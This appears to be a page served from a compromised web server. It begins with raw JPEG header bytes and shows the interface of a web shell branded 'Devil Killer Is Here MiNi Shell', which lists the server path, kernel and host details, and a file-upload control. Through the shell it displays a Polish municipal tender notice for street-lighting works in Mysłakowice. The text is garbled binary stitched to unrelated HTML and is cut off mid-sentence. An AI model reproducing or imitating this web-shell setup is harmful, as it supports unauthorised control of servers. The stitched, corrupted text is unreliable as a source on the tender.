JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220405/0011063201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa oświetlenia ulicznego na terenie gminy Mysłakowice </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi zamawiający centralny</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Mysłakowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821701</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szkolna 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mysłakowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-533</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">756439960</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">756439999</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pzp@myslakowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://myslakowice.bip.net.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa oświetlenia ulicznego na terenie gminy Mysłakowice </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-96d12d6f-b4d4-11ec-97c7-b646b0ba23df</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00110632</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00003332/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa oświetlenia drogowego na terenie Gminy Mysłakowice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wniniejszym postępowaniu<br/>komunikacja między Zamawiającym a Wykonawcami odbywa się przy<br/>użyciumini Portalu https://miniportal.uzp.gov.pl/, ePUAPU https://epuap.gov.pl/wps/portal oraz<br/>pocztyelektronicznej - pzp@myslakowice.pl (przy czym ten sposób komunikacji nie jest właściwy dla<br/>ofertyoraz dokumentów składanych wraz z ofertą). Uczestnicy postępowania składając ofertę<br/>akceptująpostanowienia: a) Regulaminu korzystania z systemu miniPortal – dostępnego pod<br/>adresem:https://miniportal.uzp.gov.pl/WarunkiUslugib) Instrukcji użytkownika systemu<br/>miniPortalePUAP<br/>–dostępnej pod adresem: https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortalePUAP.<br/>pdf2.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie niniejszego<br/>zamówieniapublicznego musi posiadać konto na e-PUAP. Wykonawca posiadający konto na ePUAP<br/>ma dostęp doformularzy: złożenia, zmiany, wycofania oferty oraz do formularza do komunikacji. 3.<br/>Wymaganiatechniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopiidokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały wRegulaminie korzystania z miniPortalu oraz Regulaminie ePUAP.4. Maksymalny<br/>rozmiar plikówprzesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, wymiany,<br/>wycofania oferty lubwniosku oraz do komunikacji wynosi 150 MB. 5. Za datę przekazania oferty,<br/>zawiadomień,dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń orazinnych informacji przyjmuje się datę ich przekazania na ePUAP.6. We wszelkiej<br/>korespondencjizwiązanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się nr<br/>ogłoszenia (BZP,TED lub ID postępowania).7. Skrytka e-PUAP Zamawiającego:<br/>/Myslakowice/SkrytkaESP9. Adresstrony internetowej, na której udostępniane będą zmiany i<br/>wyjaśnienia treści SWZ oraz inne dokumentyzamówienia bezpośrednio związane z postępowaniem o<br/>udzielenie zamówienia:https://myslakowice.bip.net.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. U. UE L z<br/>2016 r. Nr119, str. 1 z późn.zm.), dalej „RODO”, informuję, że: • administratorem Pani/Pana danych<br/>osobowychjest Gmina Mysłakowice, 58-533 Mysłakowice ul. Szkolna 5• inspektorem ochrony danych<br/>osobowychw Gminie Mysłakowice jest RODOSTAR Dawid Kaszuba, ul. Przepiórek 10, 41-215<br/>Sosnowiec •Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanymz postępowaniem o udzielenie zamówienia publicznego pn. Budowa oświetlenia ulicznego na terenie gminy Mysłakowice,<br/>Znak sprawy: RGK.ZP.271.09.2021 prowadzonym w trybie podstawowym bez<br/>negocjacji,•odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona<br/>zostaniedokumentacja postępowania w oparciu o art. 18 ustawy z dnia 11 września 2019 r. – Prawo<br/>zamówieńpublicznych (tj. Dz. U. z 2019 r. poz. 2019 z póź. zm.), dalej „ustawa Pzp”; • Pani/Pana dane<br/>osobowebędą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia<br/>zakończeniapostępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okresprzechowywania obejmuje cały czas trwania umowy;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGK.ZP.271.09.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wojanów dz. nr 194, 195, 196 – etap I:<br/>Przedmiotem zamówienia są roboty budowlane związane z budową fragmentu obwodu nr 1 sieci energetycznej niskiego<br/>napięcia oświetlenia ulicznego od projektowanej szafki oświetleniowej SO, zlokalizowanej przy złączu pomiarowo-kablowym<br/>JGJ402507. Do wykonania są punkty oświetleniowe nr I/1 i I/2, zgodnie z dokumentacją projektową w miejscowości<br/>Wojanów dz. nr 194, 195, 196 obręb 0011, w tym:<br/>• dostawa i montaż kompletnej szafki oświetleniowej wraz z wykonaniem przyłącza do złącza kablowego ,<br/>• dostawa i montaż opraw oświetleniowych LED o mocy 30W (temperatura barwowa światła 4000 K, efektywność oprawy<br/>minimum 131 lm/W), w ilości 2 szt.,<br/>• dostawa i montaż 2 szt. słupów oświetleniowych ocynkowanych, malowanych proszkowo RAL 9006 o wysokości 6,0 m. z<br/>wysięgnikami o długości 0,5 m i fundamentami F100/30.<br/>• zasilanie kablem typu YAKXS 4x16 mm2, układanym na całej długości w rurze osłonowej DVK 75,<br/>• uziemienie wykonane za pomocą ułożonego w wykopie taśmy stalowej ocynkowanej FeZn 30x4 m,<br/>• oznakowanie słupów oświetleniowych,<br/>• odtworzenie nawierzchni jezdni, poboczy i zieleńców,<br/>• wykonanie niezbędnych pomiarów i prób oraz dokumentacji geodezyjnej.<br/>Szczegółowe informacje znajdują się w dokumentacji projektowej w załączeniu.<br/>Ilość robót należy określić na podstawie dokumentacji projektowej oraz wizji w terenie </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zakres<br/>powyższych zamówień będzie polegał na powtórzeniu podobnych dostaw,<br/>usług lub robót budowlanych , jak w zamówieniu podstawowym do 15% wartości zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi<br/>kryteriami i wagami: kryterium obowiązujące: cena waga: 60% kryterium przedmiotowe: okres<br/>gwarancji i rękojmi waga: 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Bukowiec ul. Tokarska – etap III:<br/>Przedmiotem zamówienia są roboty budowlane związane z budową odcinka sieci energetycznej niskiego napięcia<br/>oświetlenia ulicznego w miejscowości Bukowiec przy ul. Tokarskiej (dz. nr 1/2, 243, 245/2, 248, 251/1, 252 obręb 0002<br/>Bukowiec) w tym:<br/>1) budowa odcinka sieci energetycznej niskiego napięcia oświetlenia ulicznego od istniejącego słupa 2/5/L2 do słupa 2/6/L3<br/>włącznie, w tym:<br/>2) montaż szafki SO oraz wybudowanie przyłącza zgodnie z warunkami przyłączenia nr WP/010169/2022/O01R01 z dnia<br/>11.02.2022 r. wydanymi przez Tauron Dystrybucja SA. Szafkę oświetleniową wykonać na bazie typowej, atestowanej<br/>obudowy z tworzywa sztucznego. W części pomiarowej szafki zabudować zabezpieczenie główne (wyłącznik nadprądowy<br/>16A o charakterystyce „C”) oraz tablicę na licznik 3-fazowy, przystosowaną do oplombowania. W części sterowniczej szafki<br/>zainstalować rozłącznik, a także ochronnik przeciwprzepięciowy z wyłącznikiem nadprądowym dostosowanym do zasilenia<br/>obwodu składającego się z 14 opraw oświetlenia LED (P = 14 szt. x 39W ≈ 0,6 kW). Sterowanie oświetleniem odbywać się<br/>będzie za pomocą cyfrowego, 2-kanałowego programatora astronomicznego z funkcją programowania bezpośrednio w<br/>zegarze lub zdalnie za pomocą bezpłatnej aplikacji mobilnej przy wykorzystaniu komunikacji bezprzewodowej NFC.<br/>Poszczególne obwody oświetleniowe zabezpieczyć rozłącznikami bezpiecznikowymi. Szynę ochronną PE szafki<br/>oświetleniowej połączyć z uziomem.<br/> dostawa i montaż opraw oświetleniowych LED o mocy 36W, temperatura barwowa światła 5000K w ilości 1 szt.,<br/> dostawa i montaż 1 szt. słupa oświetleniowego aluminiowego anodowanego w kolorze INOX (kolor dostosowany do<br/>istniejących słupów) o wysokości 6,0 m, z zabezpieczeniem elastomerem na wysokość 0,5m w dolnej części słupa,<br/>dostosowanych do montażu na fundamencie o rozstawie śrub 20x20 cm,<br/> dostawa i montaż 1 szt. wysięgnika aluminiowego anodowanego dł. 0,5m,<br/> dostawa i zasilenie kablem typu YAKXS 5x25 mm2,<br/> złącze słupowe TB-11 – 1 szt.,<br/> oznakowanie słupa oświetleniowego,<br/> odtworzenie nawierzchni jezdni, poboczy i zieleńców,<br/> wykonanie niezbędnych pomiarów i prób oraz dokumentacji geodezyjnej.<br/>3) budowa odcinka sieci energetycznej niskiego napięcia oświetlenia ulicznego od istniejącego słupa nr 1/4/L1 do słupa nr<br/>1/24/L3 włącznie, w tym:<br/> dostawa i montaż opraw oświetleniowych LED o mocy 36W, temperatura barwowa światła 5000K w ilości 2 szt.,<br/> dostawa i montaż 2 szt. słupów oświetleniowych aluminiowych anodowanych w kolorze INOX (kolor dostosowany do<br/>istniejących słupów) o wysokości 6,0 m, z zabezpieczeniem elastomerem na wysokość 0,5m w dolnej części słupa,<br/>dostosowanych do montażu na fundamencie o rozstawie śrub 20x20 cm,<br/> dostawa i montaż 2 szt. wysięgników aluminiowych anodowanych dł. 0,5m,<br/> dostawa i zasilenie kablem typu YAKXS 5x25 mm2,<br/> złącze słupowe TB-11 – 2 szt.,<br/> oznakowanie słupów oświetleniowych,<br/> odtworzenie nawierzchni jezdni, poboczy i zieleńców,<br/> wykonanie niezbędnych pomiarów i prób oraz dokumentacji geodezyjnej.<br/>Szczegółowe informacje znajdują się w dokumentacji projektowej w załączeniu.<br/>Ilość robót należy określić na podstawie dokumentacji projektowej oraz wizji w terenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zakres<br/>powyższych zamówień będzie polegał na powtórzeniu podobnych dostaw,<br/>usług lub robót budowlanych , jak w zamówieniu podstawowym do 15% wartości zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi<br/>kryteriami i wagami: kryterium obowiązujące: cena waga: 60% kryterium przedmiotowe: okres<br/>gwarancji i rękojmi waga: 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Mysłakowice ul. Błękitna i Żółta na Osiedlu Tęcza – etap VI:<br/>Przedmiotem zamówienia są roboty budowlane związane z budową odcinka obwodu nr 1 sieci energetycznej niskiego<br/>napięcia oświetlenia ulicznego ul. Błękitnej i Żółtej na Osiedlu Tęcza (dz. nr 958/30 i 958/53 obręb 0009 Mysłakowice) od<br/>istniejącego słupa L7/3 do słupa L19/3 włącznie tj. punkty oświetleniowe L8/3, L11/3, L12/3, L15/3, L16/3, L17/3, L18/3,<br/>L19/3 zgodnie z dokumentacją projektową w miejscowości Mysłakowice, w tym:<br/> dostawa i montaż opraw oświetleniowych kulistych o mocy 70W w ilości 8 szt. zgodnych z typoszeregiem zastosowanym na<br/>dotychczas wykonanych odcinkach tego samego obwodu,<br/> dostawa i montaż 8 szt. słupów stalowych o wysokości 5 m. z prefabrykowanymi fundamentami. Słupy zgodne z<br/>typoszeregiem zastosowanym na dotychczas wykonanych odcinkach tego samego obwodu wyposażone w tabliczki<br/>bezpiecznikowe typu TB-1,<br/> zasilanie kablem typu YAKY 4x25 mm2, zabezpieczonym na całej długości w rurą osłonową o średnicy 75 mm<br/>przystosowaną do układania pod drogami,<br/> przejście poprzeczne kabli przez jezdnie dróg wykonać jako przewierty sterowane za pomocą przeznaczonych do tego rur<br/>HDPE o średnicy 110/6,3 mm,<br/> uziemienie wykonane za pomocą ułożonej w wykopie bednarki stalowej ocynkowanej 25x4 mm na całej długości odcinka,<br/> odtworzenie odcinka chodnika na odcinku od lampy od nr L8/3 do lampy nr L12/3 powinno zawierać następujące warstwy<br/>konstrukcyjne:<br/>• warstwa odsączająca z pospółki gr. 10 cm,<br/>• podbudowa zasadnicza dwuwarstwowa gr. 20cm (10+10) z kruszywa łamanego 0/31,5 mm stabilizowanego mechanicznie,<br/>• warstwa wyrównawcza – podsypka cementowo-piaskowa gr. 3 cm,<br/>• nawierzchnia z kostki brukowej betonowej o gr. 8 cm – kształt i kolor jednakowy na całej długości i szerokości chodnika,<br/>• obrzeża betonowe 8/30/100 na ławie betonowej C10/15 z oporem i podsypce cementowo-piaskowej gr. 5 cm.<br/> oznakowanie słupów oświetleniowych,<br/> odtworzenie nawierzchni jezdni, poboczy i zieleńców,<br/> wykonanie niezbędnych pomiarów i prób oraz dokumentacji geodezyjnej.<br/>Szczegółowe informacje znajdują się w dokumentacji projektowej w załączeniu.<br/>Ilość robót należy określić na podstawie dokumentacji projektowej oraz wizji w terenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy 